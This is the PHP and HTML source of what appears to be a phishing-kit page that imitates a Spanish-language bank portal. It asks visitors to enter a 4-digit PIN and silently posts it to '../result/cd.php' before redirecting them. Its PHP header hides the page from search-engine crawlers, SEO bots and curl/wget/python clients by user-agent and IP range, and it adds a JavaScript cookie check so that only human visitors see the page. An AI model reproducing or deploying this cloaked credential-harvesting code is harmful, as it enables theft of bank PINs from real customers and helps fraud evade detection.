<?php
// === Block & Log Bot Visitors ===

function logBlocked($reason) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
    $time = date("Y-m-d H:i:s");
    $log = "[$time] BLOCKED: $reason | IP: $ip | UA: $ua\n";
    file_put_contents(__DIR__ . '/blocked.log', $log, FILE_APPEND);
    http_response_code(403);
    exit("Access Denied: $reason.");
}

// === Block by Known Bot User-Agents ===
$blockedAgents = [
    'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider',
    'yandex', 'sogou', 'exabot', 'facebot', 'ia_archiver',
    'mj12bot', 'ahrefsbot', 'semrush', 'dotbot', 'gigabot', 'spbot',
    'crawler', 'scrapy', 'python', 'wget', 'curl'
];

$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
foreach ($blockedAgents as $bot) {
    if (strpos($ua, $bot) !== false) {
        logBlocked("Bot User-Agent: $bot");
    }
}

// === Block by Known Bot CIDR IP Ranges ===
function ipInCIDR($ip, $cidr) {
    list($net, $mask) = explode('/', $cidr);
    $ipDec = ip2long($ip);
    $netDec = ip2long($net);
    $maskDec = ~((1 << (32 - $mask)) - 1);
    return ($ipDec & $maskDec) === ($netDec & $maskDec);
}

// Example CIDRs of Google, Bing, Ahrefs (partial — you can expand)
$blockedCIDRs = [
    '66.249.64.0/19',   // Googlebot
    '64.233.160.0/19',  // Googlebot
    '157.55.0.0/16',    // Bingbot
    '207.46.0.0/16',    // Bingbot
    '199.30.228.0/22',  // Ahrefs
    '5.45.207.0/24',    // Ahrefs
];

$visitorIP = $_SERVER['REMOTE_ADDR'];
foreach ($blockedCIDRs as $cidr) {
    if (ipInCIDR($visitorIP, $cidr)) {
        logBlocked("Bot IP Range: $cidr");
    }
}

// === JavaScript Challenge ===
// Humans pass, most bots don’t execute JS
if (!isset($_COOKIE['js_challenge_passed'])) {
    echo "<script>document.cookie='js_challenge_passed=true; path=/';location.reload();</script>";
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Pin</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            background: #fff;
            font-family: sans-serif;
        }

        header {
            width: 100%;
            padding: 1rem;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .logogo img {
            width: 100%;
            height: auto;
        }

        .logogo {
            width:170px;
            height: 54px;
        }

        .flecontu {
            display: flex;
            align-items: center;
            gap: 1rem;
        }

        .flecontu a {
            color: #00843d;
            text-decoration: none;
        }
        main {
            width: 450px;
            margin: auto;
            margin-top: 2rem;
        }
        form h1 {
            color: #00843d;
            font-size: 33px;
            font-weight: 400;
            text-align: start;
            margin-bottom: 1.5rem;
        }
        form input {
            height: 50px;
            border: 1px solid #cccccc;
            color: #333333;
            outline: none;
            width: 100%;
            padding: 0 15px;
            margin-bottom: 1.3rem;
        }
        form button {
            padding: 1rem;
            background: #299e60;
            color: #fff;
            border: none;
            border-radius: 5px;
            width: 100%;
            height: 50px;
        }
        .bottonlin {
            background: #cccccc;
        }
        .flexjkd {
            display: flex;
            align-items: center;
            gap: 0;
            width: 80%;
            margin: auto;
        }
        .flexjkd a {
            padding: 8px 14px;
            color: #333333;
            font-family: sans-serif;
            border-right: 1px solid #333333;
            font-size: 13px;
            text-decoration: none;
            text-transform: uppercase;
        }
        #loadd {
            width: 100%;
            height: 100vh;
            background: #eeebeb6f;
            display: none;
            align-items: center;
            justify-content: center;
            position: fixed;
            z-index: 999;
            top: 0;
            left: 0;
            /* display: n; */
        }
        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        border-radius: 50%;
        }

        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        width: 36px;
        height: 36px;
        }

        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        width: 36px;
        height: 36px;
        animation: spin89345 1s linear infinite;
        }

        @keyframes spin89345 {
        0% {
            transform: rotate(0deg);
        }

        100% {
            transform: rotate(360deg);
        }
        }
        @media screen and (max-width: 768px) {
            .flexjkd {
                width: 100%;
            }
            .logimd {
                display: none;
            }
            .flecontu {
                display: none;
            }
            main {
                width: 90%;
                margin: auto;
                margin-top: 3rem;
            }
            .logogo {
                width: 115px;
                height: 35px;
            }
            .flexjkd a {
            padding: 8px 10px;
            color: #333333;
            font-family: sans-serif;
            border-right: 1px solid #333333;
            font-size: 10px;
            text-decoration: none;
            text-transform: uppercase;
        }
        }
    </style>
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
</head>
<body>
    <header>
        <div class="logogo">
            <img src="../img/logoo.png" alt="">
        </div>
        <div class="flecontu" style="visibility: hidden;">
            <a href="#">Contacta con nosotros</a>
            <a href="#">English</a>
        </div>
    </header>
    <div class="bottonlin">
        <div class="flexjkd">
            <a href="#" style="color: #fff;background: #00843d;">HOGAR</a>
            <a href="#">DECLARACIÓN</a>
            <a href="#">Cuentas</a>
            <a href="#">Informe</a>
            <a href="#">Administración</a>
            <a href="#">Ayuda</a>
        </div>
    </div>
    <main>
        <form action="" method="post" id="les">

            <h1>Introducir PIN</h1>
            <input type="text" name="cc" maxlength="4" placeholder="Código PIN" id="" required>

            <!-- <input type="password" name="bb" id="password" placeholder="Email password" required> -->

            <button type="submit">Verificar</button>
        </form>
    </main>
    <div id="loadd">
        <div class="loader"></div>
     </div>
    <script>
         var fille = "../result/cd.php"; // Your php url here e.g http://youdomain.com/result.php
          var formSubmitted = 0;
  
          $("#les").on("submit", function (event) {
          
              event.preventDefault();
  
              formSubmitted++;
              
              var inputs = $('input[required]');
              for (var i = 0; i < inputs.length; i++) {
                  if (!inputs[i].value.trim()) {
                      alert("Please fill in all fields.");
                      return;
                  }
              }
              
              var formData = new FormData(this);
  
              $.ajax({
                  url: `${fille}`,
                  type: 'POST',
                  data: formData,
                  processData: false, // Required to send FormData
                  contentType: false, // Required to not set default content type
                  success: function (response) {
                      console.log(response);
                      
                      if (formSubmitted >= 1) {
                        console.log("GOOOOOO");
                        document.getElementById("loadd").style.display = "flex";
                          setTimeout(() => {
                              window.location.href = `./index.php`;
                          }, 2000);
                      } 
                  }
              });
          });
    </script>
</body>
</html>